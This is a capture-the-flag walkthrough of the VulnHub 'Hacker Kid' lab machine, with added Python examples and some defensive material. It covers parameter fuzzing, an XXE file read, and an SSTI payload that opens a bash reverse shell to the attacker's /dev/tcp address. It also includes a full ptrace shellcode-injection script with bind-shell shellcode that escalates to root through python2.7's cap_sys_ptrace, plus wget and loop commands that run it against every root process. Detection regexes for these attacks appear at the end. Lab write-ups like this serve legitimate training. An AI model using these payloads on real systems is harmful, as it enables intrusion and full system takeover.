Hacker_Kid (Hacker Kid: XXE, SSTI, python2.7 capability privilege escalation)

1. Download

Hacker kid: 1.0.1 ~ VulnHub

2. Host discovery and port scanning

nmap -sP 192.168.3.1/24    # ping sweep of the VM subnet (-sP is the legacy spelling of -sn)

nmap -A 192.168.3.138    # version/OS detection, default scripts and traceroute against the host found

3. The scan shows two web ports, 80 and 9999 (plus DNS on 53); start with http://192.168.3.138:80

4. The page source contains a commented-out hint naming a page_no parameter. Capture the request in Burp and brute-force the parameter value, sorting the results by response length: page_no=21 comes back with a different length and its body reveals the subdomain hackers.blackhat.local.
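To show the length-based fuzzing from step 4 in code, here is an added example (not from the original write-up): it requests a range of page_no values and reports the ones whose response length differs from the majority, which is how the page_no=21 hit stands out in Burp Intruder. The fake_fetch responses and the base URL are constructed for the offline run; http_fetch is the function to pass for a live target.

```python
import collections
import urllib.request


def http_fetch(url):
    """Fetch url and return the raw body; use this against a live target."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read()


def fake_fetch(url):
    """Offline stand-in for the 80/tcp page (constructed data): every page_no
    returns the same filler except 21, which carries the hint."""
    page_no = int(url.rsplit("=", 1)[1])
    if page_no == 21:
        return b"<p>Hint: our new site is at hackers.blackhat.local</p>"
    return b"<p>Nothing here yet.</p>"


def fuzz_param(fetch, base_url, param, values):
    """Request base_url?param=<v> for every v and record the response length."""
    return {v: len(fetch("%s?%s=%s" % (base_url, param, v))) for v in values}


def outliers(lengths):
    """Values whose response length differs from the most common length,
    i.e. what sorting Intruder's results by the Length column surfaces."""
    common = collections.Counter(lengths.values()).most_common(1)[0][0]
    return sorted(v for v, n in lengths.items() if n != common)


if __name__ == "__main__":
    lengths = fuzz_param(fake_fetch, "http://192.168.3.138/", "page_no", range(100))
    print(outliers(lengths))
```

Against a real target swap fake_fetch for http_fetch; if several lengths are common (for example paginated content), compare against the median instead of the mode.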

5. Query the target's own DNS server with dig to find further names (the original calls this a reverse lookup; it is an ordinary forward query sent directly to the box's name server on port 53)

dig hackers.blackhat.local @192.168.3.138    # the response also exposes a second name, hackerkid.blackhat.local

vi /etc/hosts    # add the line "192.168.3.138 hackerkid.blackhat.local" so the browser resolves the virtual host

6. Browse to http://hackerkid.blackhat.local/ (a registration form whose fields are sent as XML and reflected back)

7. Use the XXE vulnerability to read /etc/passwd

We still have no password. /etc/passwd lists a user called saket, so use the same external entity to read that account's profile, /home/saket/.bashrc, which contains a password in a comment.

Base64 online encode/decode tool: Base64.us (used to decode the exfiltrated file contents, which come back base64-encoded)
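The write-up does not print its XXE payload, so here is an added example (not the page's code) of the whole mechanism in Python's xml.sax: a registration-style XML document whose <name> field expands an external entity, parsed once with external general entities enabled (the vulnerable setting, and the default in Python before 3.7.1) and once with them disabled. The "secret" file and its content are constructed stand-ins for /home/saket/.bashrc; the document shape (root/name/email) is assumed.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the file the attacker wants (/home/saket/.bashrc on
# the box); the value is made up, not the real box's password.
SECRET_CONTENT = "export DB_PASS=made-up-value"


def write_secret_file():
    f = tempfile.NamedTemporaryFile("w", suffix=".bashrc", delete=False)
    f.write(SECRET_CONTENT)
    f.close()
    return f.name


def xxe_payload(file_url):
    """Registration XML whose <name> field expands an external entity.
    The app echoes the name back, so the file contents return in the response."""
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE root [<!ENTITY xxe SYSTEM "%s">]>'
        "<root><name>&xxe;</name><email>a@b.c</email></root>" % file_url
    )


class Fields(ContentHandler):
    """Collects the text of each element, the way a naive form handler would."""

    def __init__(self):
        super().__init__()
        self.data = {}
        self._cur = None

    def startElement(self, name, attrs):
        self._cur = name
        self.data.setdefault(name, "")

    def characters(self, content):
        if self._cur is not None:
            self.data[self._cur] += content

    def endElement(self, name):
        self._cur = None


def parse_registration(xml_text, resolve_external_entities):
    """resolve_external_entities=True is the vulnerable configuration: the
    parser fetches whatever SYSTEM "..." points at (file://, http://, ...)
    and splices it into the document. False leaves the entity unexpanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = Fields()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode()))
    return handler.data


def demo():
    """Returns (what the vulnerable parser leaks, what the hardened one returns)."""
    path = write_secret_file()
    try:
        payload = xxe_payload("file://" + path)
        leaked = parse_registration(payload, resolve_external_entities=True)["name"]
        blocked = parse_registration(payload, resolve_external_entities=False)["name"]
    finally:
        os.unlink(path)
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

Files with characters that break the XML (<, &) or binary content are why attackers wrap the entity in a base64 filter or an out-of-band channel; the hardened branch here is the fix, and defusedxml gives the same result for every stdlib parser at once.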

8. Log in at http://192.168.3.156:9999/ with the recovered credentials (the target's DHCP address changed between sessions: .138 above, .156 from here on)

9. Use SSTI (server-side template injection) to get a reverse shell

First start a listener on Kali (192.168.3.133) on port 4567, then send the payload in the name parameter:

?name={% import os %}{{os.system('bash -c "bash -i > /dev/tcp/192.168.3.133/4567 0>&1 2>&1"')}}

{% import os %} imports a Python module, which is Tornado template syntax (in Jinja2, {% import %} only loads another template), so a working payload of this form tells us the 9999 service is a Tornado app rather than Flask. The redirections send bash's stdout to the TCP connection and duplicate it onto stdin and stderr.

Online URL encoder/decoder: BeJSON.com

%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.3.133%2F4567%200%3E%261%202%3E%261%22')%7D%7D

10. python2.7 privilege escalation (Linux capabilities)

/sbin/getcap -r / 2>/dev/null    # recursively list every file on the system that carries capabilities; here python2.7 shows up with cap_sys_ptrace+ep
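An added example (not from the write-up) that parses getcap output and flags the capabilities that give a local user a direct route to root, so the python2.7 + cap_sys_ptrace finding stands out among the harmless distro defaults. The sample output is constructed, and the /usr/bin/python2.7 path is an assumption; the page only says python2.7.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null`: the python2.7 line is the
# finding from this box (path assumed), the others are typical distro defaults.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that hand a local user a short path to root when they sit on
# something the user can drive (an interpreter, an editor, a shell).
DANGEROUS = {
    "cap_sys_ptrace": "attach to root-owned processes and inject code (this box)",
    "cap_setuid": "call setuid(0)",
    "cap_setgid": "call setgid(0)",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_dac_override": "write any file, e.g. /etc/passwd",
    "cap_sys_admin": "mount filesystems and much more",
    "cap_sys_module": "load kernel modules",
}

# Both output styles: 'path = cap_a,cap_b+ep' (older libcap) and
# 'path cap_a,cap_b=ep' (newer libcap).
LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>\S+)$")


def parse_getcap(output):
    """Yield (path, [capability names], flags) per getcap line."""
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        parts = re.split(r"[+=]", m.group("caps"), maxsplit=1)
        names = parts[0].split(",")
        flags = parts[1] if len(parts) > 1 else ""
        yield m.group("path"), names, flags


def triage(output):
    """Return [(path, capability, why)] for dangerous capabilities that are
    effective (e) or permitted (p); inheritable-only entries are ignored."""
    hits = []
    for path, names, flags in parse_getcap(output):
        if not ("e" in flags or "p" in flags):
            continue
        for cap in names:
            if cap in DANGEROUS:
                hits.append((path, cap, DANGEROUS[cap]))
    return hits


if __name__ == "__main__":
    for path, cap, why in triage(SAMPLE_GETCAP):
        print("%s: %s -> %s" % (path, cap, why))
```

The fix on the defending side is simply setcap -r on the interpreter; no interpreter, editor or shell should carry cap_sys_ptrace or cap_setuid.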

Escalate with a Python ptrace injection script run from that python2.7

# inject.py
# The C program at the GitHub link below can be used as a reference for writing the Python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
#
# Python 2 script (xrange, str.encode('hex')). It is deliberately run with the
# /usr/bin/python2.7 that carries cap_sys_ptrace, which is what allows an
# unprivileged user to attach to a root-owned process.

import ctypes
import os
import sys
import struct

# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17

# Structure defined in <sys/user.h> (x86-64 layout)
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]

libc = ctypes.CDLL("libc.so.6")

pid = int(sys.argv[1])

# Define the argument types and the return type. A signed return type lets us
# recognise the -1 that ptrace() returns on failure.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_long

# Attach to the process (needs cap_sys_ptrace when the target is root-owned).
if libc.ptrace(PTRACE_ATTACH, pid, None, None) == -1:
    sys.exit("ptrace(PTRACE_ATTACH, %d) failed" % pid)

# Wait for the tracee to enter ptrace-stop; GETREGS/POKETEXT on a tracee that
# has not stopped yet fail with ESRCH.
os.waitpid(pid, 0)

registers = user_regs_struct()

# Retrieve the values stored in the registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))

print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))

# Shellcode copied from exploit-db: x86-64 bind shell that listens on TCP 5600
# (0x15e0) and execs /bin//sh. It contains no 0x00 bytes.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

# Inject the shellcode into the running process, 4 bytes per PTRACE_POKETEXT.
# POKETEXT actually writes a full 8-byte word; the upper bytes are zero and get
# overwritten by the next iteration.
for i in xrange(0, len(shellcode), 4):

    # Convert the chunk to a little-endian integer so that its first byte lands
    # at the lowest address. The rstrip('\x00') is harmless here because the
    # shellcode has no zero bytes; a chunk starting with 0x00 would be packed
    # wrongly by it.
    shellcode_byte_int = int(shellcode[i:4 + i].encode('hex'), 16)
    shellcode_byte_little_endian = struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
    shellcode_byte = int(shellcode_byte_little_endian, 16)

    # Inject the word.
    libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip + i), shellcode_byte)

print("Shellcode Injected!!")

# Modify the instruction pointer. The process was most likely stopped inside a
# system call; when it resumes, the kernel rewinds rip by 2 (the length of the
# syscall instruction) to restart that call, so start 2 bytes ahead.
registers.rip = registers.rip + 2

# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))

print("Final Instruction Pointer: " + hex(registers.rip))

# Detach from the process; it resumes at rip and runs the shellcode.
libc.ptrace(PTRACE_DETACH, pid, None, None)
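An added example, not part of the original post, on the byte packing that inject.py performs before each PTRACE_POKETEXT: pack_words splits shellcode into native-word-sized little-endian integers with struct; page_style_pack reproduces the script's int/hex/rstrip conversion to show where it goes wrong (a 4-byte chunk whose first byte is 0x00 loses one byte of shift); and bind_port recovers the listening port from the shellcode's mov word [rsp+2], imm16 so you can confirm which port to connect to. SHELLCODE is the page's own shellcode; the bind_port pattern is specific to it.

```python
import struct

# The page's bind-shell shellcode (x86-64). It contains no 0x00 bytes.
SHELLCODE = (
    b"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05"
    b"\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10"
    b"\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e"
    b"\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f"
    b"\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
)

WORD = 8  # PTRACE_POKETEXT writes one native word: 8 bytes on x86-64


def pack_words(shellcode, word=WORD):
    """Return [(offset, value)] for PTRACE_POKETEXT(pid, rip + offset, value).

    Each chunk is decoded little-endian so its first byte lands at the lowest
    address. The final chunk is zero-padded; those zeros overwrite the bytes
    just past the shellcode, which the caller must be able to tolerate."""
    fmt = {4: "<I", 8: "<Q"}[word]
    return [
        (off, struct.unpack(fmt, shellcode[off:off + word].ljust(word, b"\x00"))[0])
        for off in range(0, len(shellcode), word)
    ]


def page_style_pack(chunk):
    """The conversion inject.py applies to each 4-byte chunk, reproduced here.

    int(hex) reads the chunk big-endian, pack('<I') reverses the bytes,
    rstrip drops trailing zero bytes and int(hex) re-reads what is left.
    The strip is the problem: a chunk whose FIRST byte is 0x00 ends up as a
    zero byte at the END of the reversed buffer, is stripped, and every other
    byte shifts down one position. A short final chunk is handled correctly."""
    value = int(chunk.hex(), 16)
    reversed_bytes = struct.pack("<I", value).rstrip(b"\x00")
    return int(reversed_bytes.hex(), 16)


def bind_port(shellcode):
    """Listening port of this bind shell: sin_port is written by
    'mov word [rsp+2], imm16', encoded 66 c7 44 24 02 <imm16>, and the
    immediate is already in network byte order."""
    idx = shellcode.index(b"\x66\xc7\x44\x24\x02")
    return struct.unpack(">H", shellcode[idx + 5:idx + 7])[0]


if __name__ == "__main__":
    for off, value in pack_words(SHELLCODE):
        print("rip+%-2d <- 0x%016x" % (off, value))
    print("bind port:", bind_port(SHELLCODE))
```

If you ever swap in shellcode that contains zero bytes, replace the script's three-line conversion with the struct.unpack form above; the rstrip bug would otherwise corrupt exactly the chunks that start with 0x00.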

11. Put the script on the target and run it against root-owned processes to get a root shell

python -m http.server 7654    # on Kali: serve the script over HTTP

wget http://192.168.3.133:7654/pp.py    # on the target, in saket's shell: fetch the script

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 pp.py $i; done

# On the target: list every process owned by root and run pp.py against each PID.
# The injection only takes in some of them (kernel threads cannot be attached, and
# the rip+2 adjustment assumes the process was stopped inside a syscall), which is
# why the loop simply tries them all. Note that grep root also matches any process
# whose command line merely contains the word "root".

nc 192.168.3.156 5600    # from Kali: the shellcode is a bind shell on TCP 5600, so connecting to it gives a root shell

12. Walkthrough narrative

When I did this penetration test I was given a virtual machine file; after booting it I could see an Ubuntu system but had no credentials. Because it was a VM on the local network, I used nmap -sP for host discovery and then nmap -A IP for a port scan, which found three ports: 53 (DNS) and two web ports, 80 and 9999. Browsing to IP:port, 9999 was a login page and 80 was a page introducing the VM. Its source contained a commented-out hint about a parameter named page_no. Brute-forcing that parameter with Burp showed that page_no=21 returned a response of a different length, and that response contained the subdomain hackers.blackhat.local. Querying the target's DNS server with dig revealed another name, hackerkid.blackhat.local; after adding it to /etc/hosts I reached a registration page asking for account, password, user name, e-mail and so on.

Testing the form I noticed my input was reflected back, and the page source showed that the PHP code worked with an XML parameter, so I suspected XXE. An XXE payload pulled out /etc/passwd, which listed a usable account, saket; reading that account's profile (/home/saket/.bashrc) turned up a password in a comment. Logging in with it on port 9999 led to a page asking for my name. Requesting /?name=1 returned "hello 1", which reminded me of Flask-style SSTI; /?name={{9*9}} returned 81, proving the injection (the {% import os %} payload that eventually worked is Tornado template syntax, not Jinja2, so the backend is Tornado rather than Flask). I then built a URL-encoded bash reverse-shell payload and got a shell as saket.

That still left privilege escalation. Listing files with capabilities showed python2.7 with cap_sys_ptrace+ep, the classic Python capability escalation: that capability lets python2.7 attach to any running root-owned process, so running the Python injection script from that interpreter against a root process yields a root shell.

13. XXE traffic characteristics
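The body of section 13 is not on the page. As an added example (not from the original post), here is detection logic for the request features used in steps 7 and 9: DOCTYPE/ENTITY SYSTEM declarations in an XML body, and {{ }} / {% %} template tokens, os.system and /dev/tcp in a percent-decoded query string. The request records are constructed; the SSTI queries are the page's own probes, while the XXE body is an assumed shape, since the write-up does not print its payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed request records (method, path+query, body) in the shape a WAF or
# reverse-proxy log would provide.
SAMPLE_REQUESTS = [
    ("GET", "/?name=1", ""),
    ("GET", "/?name=%7B%7B9*9%7D%7D", ""),
    ("GET", "/?name=%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash"
            "%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.3.133%2F4567%200%3E%261%202%3E%261%22')%7D%7D", ""),
    ("POST", "/register",
     '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
     "<root><name>&xxe;</name><email>a@b.c</email></root>"),
    ("POST", "/register", "<root><name>alice</name><email>a@b.c</email></root>"),
]

# (label, pattern) applied to the percent-decoded query string and body.
RULES = [
    ("xxe-doctype-entity", re.compile(r"<!DOCTYPE[^>]*\[.*?<!ENTITY", re.I | re.S)),
    ("xxe-external-entity", re.compile(
        r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\s+[\"'](?:file|php|https?|ftp|expect|jar):", re.I)),
    ("ssti-expression", re.compile(r"\{\{.*?\}\}", re.S)),
    ("ssti-statement", re.compile(r"\{%.*?%\}", re.S)),
    ("ssti-code-exec", re.compile(
        r"\b(?:os\.(?:system|popen)|subprocess|__import__|__class__|__globals__)\b")),
    ("reverse-shell", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
]


def decode(s):
    """Percent-decode twice so one extra layer of encoding does not hide the tokens."""
    return unquote_plus(unquote_plus(s))


def classify(method, target, body):
    """Labels of every rule that fires on one request; [] means clean."""
    text = decode(target) + "\n" + decode(body)
    return [label for label, rx in RULES if rx.search(text)]


def scan(records):
    """Return (method, target, labels) for the requests that triggered a rule."""
    hits = []
    for method, target, body in records:
        labels = classify(method, target, body)
        if labels:
            hits.append((method, target, labels))
    return hits


if __name__ == "__main__":
    for method, target, labels in scan(SAMPLE_REQUESTS):
        print(method, target[:60], labels)
```

A {{7*7}} probe on its own is the earliest signal and precedes the exploit by minutes, so alert on ssti-expression alone; the xxe-doctype-entity rule is the one to keep even when the external-entity rule misses an unusual scheme, because a legitimate client never sends an internal DTD subset to a registration endpoint.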
